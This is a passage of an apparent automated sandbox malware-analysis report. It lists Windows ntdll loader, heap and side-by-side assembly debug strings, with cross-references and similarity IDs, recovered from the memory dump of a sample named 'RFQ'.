                                                                                                        • undeleted critical section in freed memory, xrefs: 01AA542B
                                                                                                        • Critical section debug info address, xrefs: 01AA541F, 01AA552E
                                                                                                        • Second initialization stack trace. Use dps to dump it if non-NULL., xrefs: 01AA54CE
                                                                                                        • Critical section address., xrefs: 01AA5502
                                                                                                        • Thread identifier, xrefs: 01AA553A
                                                                                                        • Thread is in a state in which it cannot own a critical section, xrefs: 01AA5543
                                                                                                        • Address of the debug info found in the active list., xrefs: 01AA54AE, 01AA54FA
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000005.00000002.2157658184.0000000001A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A00000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_5_2_1a00000_RFQ.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: 8$Address of the debug info found in the active list.$Critical section address$Critical section address.$Critical section debug info address$First initialization stack trace. Use dps to dump it if non-NULL.$Initialization stack trace. Use dps to dump it if non-NULL.$Invalid debug info address of this critical section$Second initialization stack trace. Use dps to dump it if non-NULL.$Thread identifier$Thread is in a state in which it cannot own a critical section$corrupted critical section$double initialized or corrupted critical section$undeleted critical section in freed memory
                                                                                                        • API String ID: 0-2368682639
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Strings
                                                                                                        • SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx, xrefs: 01AA2624
                                                                                                        • SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p, xrefs: 01AA22E4
                                                                                                        • SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx, xrefs: 01AA2412
                                                                                                        • @, xrefs: 01AA259B
                                                                                                        • SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries, xrefs: 01AA24C0
                                                                                                        • SXS: Attempt to translate DOS path name "%S" to NT format failed, xrefs: 01AA2506
                                                                                                        • SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx, xrefs: 01AA25EB
                                                                                                        • RtlpResolveAssemblyStorageMapEntry, xrefs: 01AA261F
                                                                                                        • SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx, xrefs: 01AA2498
                                                                                                        • SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx, xrefs: 01AA2409
                                                                                                        • SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx, xrefs: 01AA2602
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000005.00000002.2157658184.0000000001A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A00000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_5_2_1a00000_RFQ.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: @$RtlpResolveAssemblyStorageMapEntry$SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx$SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p$SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx$SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx$SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx$SXS: Attempt to translate DOS path name "%S" to NT format failed$SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx$SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx$SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries
                                                                                                        • API String ID: 0-4009184096
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000005.00000002.2157658184.0000000001A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A00000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_5_2_1a00000_RFQ.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: DefaultBrowser_NOPUBLISHERID$SegmentHeap$csrss.exe$heapType$http://schemas.microsoft.com/SMI/2020/WindowsSettings$lsass.exe$runtimebroker.exe$services.exe$smss.exe$svchost.exe
                                                                                                        • API String ID: 0-2515994595
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000005.00000002.2157658184.0000000001A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A00000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_5_2_1a00000_RFQ.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
                                                                                                        • API String ID: 0-1700792311
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Strings
                                                                                                        • HandleTraces, xrefs: 01AB8C8F
                                                                                                        • AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled, xrefs: 01AB8A3D
                                                                                                        • VerifierDlls, xrefs: 01AB8CBD
                                                                                                        • AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error., xrefs: 01AB8A67
                                                                                                        • VerifierFlags, xrefs: 01AB8C50
                                                                                                        • VerifierDebug, xrefs: 01AB8CA5
                                                                                                        • AVRF: -*- final list of providers -*- , xrefs: 01AB8B8F
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000005.00000002.2157658184.0000000001A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A00000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_5_2_1a00000_RFQ.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error.$AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled$AVRF: -*- final list of providers -*- $HandleTraces$VerifierDebug$VerifierDlls$VerifierFlags
                                                                                                        • API String ID: 0-3223716464
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000005.00000002.2157658184.0000000001A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A00000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_5_2_1a00000_RFQ.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: $LdrpResSearchResourceInsideDirectory Enter$LdrpResSearchResourceInsideDirectory Exit$R$T${
                                                                                                        • API String ID: 0-1109411897
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000005.00000002.2157658184.0000000001A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A00000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_5_2_1a00000_RFQ.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
                                                                                                        • API String ID: 0-792281065
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Strings
                                                                                                        • Getting the shim engine exports failed with status 0x%08lx, xrefs: 01A89A01
                                                                                                        • minkernel\ntdll\ldrinit.c, xrefs: 01A89A11, 01A89A3A
                                                                                                        • LdrpInitShimEngine, xrefs: 01A899F4, 01A89A07, 01A89A30
                                                                                                        • Loading the shim engine DLL failed with status 0x%08lx, xrefs: 01A89A2A
                                                                                                        • apphelp.dll, xrefs: 01A26496
                                                                                                        • Building shim engine DLL system32 filename failed with status 0x%08lx, xrefs: 01A899ED
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000005.00000002.2157658184.0000000001A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A00000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_5_2_1a00000_RFQ.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: Building shim engine DLL system32 filename failed with status 0x%08lx$Getting the shim engine exports failed with status 0x%08lx$LdrpInitShimEngine$Loading the shim engine DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                                                        • API String ID: 0-204845295
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Strings
                                                                                                        • minkernel\ntdll\ldrinit.c, xrefs: 01A6C6C3
                                                                                                        • LdrpInitializeProcess, xrefs: 01A6C6C4
                                                                                                        • Loading import redirection DLL: '%wZ', xrefs: 01AA8170
                                                                                                        • Unable to build import redirection Table, Status = 0x%x, xrefs: 01AA81E5
                                                                                                        • LdrpInitializeImportRedirection, xrefs: 01AA8177, 01AA81EB
                                                                                                        • minkernel\ntdll\ldrredirect.c, xrefs: 01AA8181, 01AA81F5
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000005.00000002.2157658184.0000000001A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A00000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_5_2_1a00000_RFQ.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: LdrpInitializeImportRedirection$LdrpInitializeProcess$Loading import redirection DLL: '%wZ'$Unable to build import redirection Table, Status = 0x%x$minkernel\ntdll\ldrinit.c$minkernel\ntdll\ldrredirect.c
                                                                                                        • API String ID: 0-475462383
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Strings
                                                                                                        • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 01AA21BF
                                                                                                        • SXS: %s() passed the empty activation context, xrefs: 01AA2165
                                                                                                        • RtlGetAssemblyStorageRoot, xrefs: 01AA2160, 01AA219A, 01AA21BA
                                                                                                        • SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 01AA2178
                                                                                                        • SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 01AA219F
                                                                                                        • SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 01AA2180
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000005.00000002.2157658184.0000000001A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A00000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_5_2_1a00000_RFQ.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: RtlGetAssemblyStorageRoot$SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p$SXS: %s() passed the empty activation context$SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx$SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx
                                                                                                        • API String ID: 0-861424205
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        APIs
                                                                                                          • Part of subcall function 01A72DF0: LdrInitializeThunk.NTDLL ref: 01A72DFA
                                                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01A70BA3
                                                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01A70BB6
                                                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01A70D60
                                                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01A70D74
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000005.00000002.2157658184.0000000001A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A00000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_5_2_1a00000_RFQ.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$InitializeThunk
                                                                                                        • String ID:
                                                                                                        • API String ID: 1404860816-0
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000005.00000002.2157658184.0000000001A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A00000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_5_2_1a00000_RFQ.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
                                                                                                        • API String ID: 0-379654539
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Strings
                                                                                                        • LdrpInitializeProcess, xrefs: 01A68422
                                                                                                        • minkernel\ntdll\ldrinit.c, xrefs: 01A68421
                                                                                                        • @, xrefs: 01A68591
                                                                                                        • \Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers, xrefs: 01A6855E
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000005.00000002.2157658184.0000000001A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A00000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_5_2_1a00000_RFQ.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: @$LdrpInitializeProcess$\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers$minkernel\ntdll\ldrinit.c
                                                                                                        • API String ID: 0-1918872054
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Strings
                                                                                                        • SXS: %s() passed the empty activation context, xrefs: 01AA21DE
                                                                                                        • .Local, xrefs: 01A628D8
                                                                                                        • RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 01AA21D9, 01AA22B1
                                                                                                        • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 01AA22B6
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000005.00000002.2157658184.0000000001A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A00000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_5_2_1a00000_RFQ.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
                                                                                                        • API String ID: 0-1239276146
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Strings
                                                                                                        • SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix, xrefs: 01AA3456
                                                                                                        • SXS: %s() called with invalid cookie type 0x%08Ix, xrefs: 01AA3437
                                                                                                        • RtlDeactivateActivationContext, xrefs: 01AA3425, 01AA3432, 01AA3451
                                                                                                        • SXS: %s() called with invalid flags 0x%08lx, xrefs: 01AA342A
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000005.00000002.2157658184.0000000001A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A00000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_5_2_1a00000_RFQ.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: RtlDeactivateActivationContext$SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix$SXS: %s() called with invalid cookie type 0x%08Ix$SXS: %s() called with invalid flags 0x%08lx
                                                                                                        • API String ID: 0-1245972979
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Strings
                                                                                                        • ThreadPool: callback %p(%p) returned with background priorities set, xrefs: 01A910AE
                                                                                                        • ThreadPool: callback %p(%p) returned with the loader lock held, xrefs: 01A91028
                                                                                                        • ThreadPool: callback %p(%p) returned with a transaction uncleared, xrefs: 01A90FE5
                                                                                                        • ThreadPool: callback %p(%p) returned with preferred languages set, xrefs: 01A9106B
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000005.00000002.2157658184.0000000001A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A00000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_5_2_1a00000_RFQ.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: ThreadPool: callback %p(%p) returned with a transaction uncleared$ThreadPool: callback %p(%p) returned with background priorities set$ThreadPool: callback %p(%p) returned with preferred languages set$ThreadPool: callback %p(%p) returned with the loader lock held
                                                                                                        • API String ID: 0-1468400865
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Strings
                                                                                                        • minkernel\ntdll\ldrinit.c, xrefs: 01A9A9A2
                                                                                                        • LdrpDynamicShimModule, xrefs: 01A9A998
                                                                                                        • apphelp.dll, xrefs: 01A52462
                                                                                                        • Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 01A9A992
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000005.00000002.2157658184.0000000001A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A00000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_5_2_1a00000_RFQ.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                                                        • API String ID: 0-176724104
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Strings
                                                                                                        • HEAP[%wZ]: , xrefs: 01A43255
                                                                                                        • HEAP: , xrefs: 01A43264
                                                                                                        • Unable to release memory at %p for %Ix bytes - Status == %x, xrefs: 01A4327D
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000005.00000002.2157658184.0000000001A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A00000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_5_2_1a00000_RFQ.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: HEAP: $HEAP[%wZ]: $Unable to release memory at %p for %Ix bytes - Status == %x
                                                                                                        • API String ID: 0-617086771
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000005.00000002.2157658184.0000000001A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A00000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_5_2_1a00000_RFQ.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                                                                                                        • API String ID: 0-4253913091
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000005.00000002.2157658184.0000000001A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A00000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_5_2_1a00000_RFQ.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: $@
                                                                                                        • API String ID: 0-1077428164
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000005.00000002.2157658184.0000000001A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A00000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_5_2_1a00000_RFQ.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: FilterFullPath$UseFilter$\??\
                                                                                                        • API String ID: 0-2779062949
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Strings
                                                                                                        • minkernel\ntdll\ldrinit.c, xrefs: 01A9A121
                                                                                                        • LdrpCheckModule, xrefs: 01A9A117
                                                                                                        • Failed to allocated memory for shimmed module list, xrefs: 01A9A10F
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000005.00000002.2157658184.0000000001A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A00000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_5_2_1a00000_RFQ.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: Failed to allocated memory for shimmed module list$LdrpCheckModule$minkernel\ntdll\ldrinit.c
                                                                                                        • API String ID: 0-161242083
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Strings
                                                                                                        • minkernel\ntdll\ldrinit.c, xrefs: 01AA82E8
                                                                                                        • Failed to reallocate the system dirs string !, xrefs: 01AA82D7
                                                                                                        • LdrpInitializePerUserWindowsDirectory, xrefs: 01AA82DE
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000005.00000002.2157658184.0000000001A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A00000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_5_2_1a00000_RFQ.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
                                                                                                        • API String ID: 0-1783798831
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Strings
                                                                                                        • PreferredUILanguages, xrefs: 01AEC212
                                                                                                        • @, xrefs: 01AEC1F1
                                                                                                        • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 01AEC1C5
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000005.00000002.2157658184.0000000001A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A00000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_5_2_1a00000_RFQ.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: @$PreferredUILanguages$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings
                                                                                                        • API String ID: 0-2968386058
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000005.00000002.2157658184.0000000001A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A00000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_5_2_1a00000_RFQ.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: @$LdrpResValidateFilePath Enter$LdrpResValidateFilePath Exit
                                                                                                        • API String ID: 0-1373925480
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Strings
                                                                                                        • LdrpCheckRedirection, xrefs: 01AB488F
                                                                                                        • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 01AB4888
                                                                                                        • minkernel\ntdll\ldrredirect.c, xrefs: 01AB4899
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000005.00000002.2157658184.0000000001A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A00000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_5_2_1a00000_RFQ.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                                                                                                        • API String ID: 0-3154609507
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000005.00000002.2157658184.0000000001A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A00000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_5_2_1a00000_RFQ.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: (ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size)$HEAP: $HEAP[%wZ]:
                                                                                                        • API String ID: 0-2558761708
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Strings
                                                                                                        • minkernel\ntdll\ldrinit.c, xrefs: 01AB2104
                                                                                                        • Process initialization failed with status 0x%08lx, xrefs: 01AB20F3
                                                                                                        • LdrpInitializationFailure, xrefs: 01AB20FA
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000005.00000002.2157658184.0000000001A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A00000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_5_2_1a00000_RFQ.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: LdrpInitializationFailure$Process initialization failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                                                                                                        • API String ID: 0-2986994758
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000005.00000002.2157658184.0000000001A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A00000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_5_2_1a00000_RFQ.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ___swprintf_l
                                                                                                        • String ID: #%u
                                                                                                        • API String ID: 48624451-232158463
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Strings
                                                                                                        • LdrResSearchResource Exit, xrefs: 01A3AA25
                                                                                                        • LdrResSearchResource Enter, xrefs: 01A3AA13
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000005.00000002.2157658184.0000000001A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A00000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_5_2_1a00000_RFQ.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: LdrResSearchResource Enter$LdrResSearchResource Exit
                                                                                                        • API String ID: 0-4066393604
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000005.00000002.2157658184.0000000001A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A00000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_5_2_1a00000_RFQ.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: `$`
                                                                                                        • API String ID: 0-197956300
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000005.00000002.2157658184.0000000001A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A00000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_5_2_1a00000_RFQ.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: InitializeThunk
                                                                                                        • String ID: Legacy$UEFI
                                                                                                        • API String ID: 2994545307-634100481
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000005.00000002.2157658184.0000000001A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A00000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_5_2_1a00000_RFQ.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: @$MUI
                                                                                                        • API String ID: 0-17815947
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Strings
